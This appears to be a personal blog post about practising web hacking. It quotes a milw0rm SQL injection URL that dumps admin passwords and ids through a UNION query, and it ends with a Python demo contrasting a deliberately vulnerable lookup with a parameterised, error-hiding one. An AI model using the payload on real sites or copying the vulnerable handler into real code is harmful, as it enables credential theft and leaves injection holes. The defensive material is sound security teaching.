Hmm.. It's been quite a while since I've been playing with this stuff. Actually, during this Ramadhan I'm quite tired to do this hacking stuff.
For a couple of weeks I've been reading the old version of Hacking Exposed Web Applications.. even though it's old, it provides a strong foundation and understanding in 'hacking' and securing your web applications.
Tested a bug from milw0rm, more SQL injections :) The actual script from milw0rm is like this:
index.php?action=readmore&id=-1%20union%20select%200,1,concat(passwd,0x3a,userid,0x3a,adminid),3%20from%20admin/*
Change it a bit, and I got full path disclosure :) Nice.
If I have time, I would try to enumerate the user tables also :)
Well, the countermeasures: do not be so kind as to display those 'hacker-friendly' error/warning messages. Write your own custom message to obfuscate the real one. Hihhihi
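To make the countermeasure concrete, here is an added example (my own code, not from the post or the vulnerable script) that rebuilds the readmore lookup against a constructed in-memory SQLite database: the vulnerable handler pastes the id into the query and echoes raw database errors, the hardened one validates the type, binds the value, and sends the client only a neutral message while the real error goes to the server log. The payload is the page's one rewritten in SQLite syntax (|| instead of concat, -- instead of /*); table and column names are assumed from the payload.

```python
import logging
import sqlite3

log = logging.getLogger("webapp")

# Constructed stand-in for the target's database: a news table plus the
# admin table the page's payload reads from (column names taken from it).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT);
        CREATE TABLE admin(userid TEXT, passwd TEXT, adminid INTEGER);
        INSERT INTO news VALUES (1, 'Welcome', 'First article', 'editor');
        INSERT INTO admin VALUES ('root', 'hashed-secret-placeholder', 1);
    """)
    return conn

# Vulnerable pattern: the id parameter is concatenated into the SQL and any
# database error is returned verbatim, which is what leaks paths and layout.
def readmore_vulnerable(conn, raw_id):
    try:
        sql = f"SELECT id, title, body, author FROM news WHERE id={raw_id}"
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"Error: {exc}"  # verbose error sent straight to the browser

GENERIC_ERROR = "Sorry, that article could not be loaded."

# Hardened pattern: enforce the expected type, bind the parameter, and keep
# the detailed error in the server log; the client only sees GENERIC_ERROR.
def readmore_hardened(conn, raw_id):
    try:
        article_id = int(raw_id)  # anything that is not an integer is rejected
        sql = "SELECT id, title, body, author FROM news WHERE id=?"
        return conn.execute(sql, (article_id,)).fetchall()
    except (ValueError, sqlite3.Error) as exc:
        log.warning("readmore failed for id=%r: %s", raw_id, exc)
        return GENERIC_ERROR

if __name__ == "__main__":
    db = build_db()
    payload = "-1 union select 0,1,passwd||':'||userid||':'||adminid,3 from admin--"
    print(readmore_vulnerable(db, payload))  # admin row comes back
    print(readmore_hardened(db, payload))    # generic message only
```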
1 comments:
http://bprdanapos.com/ :)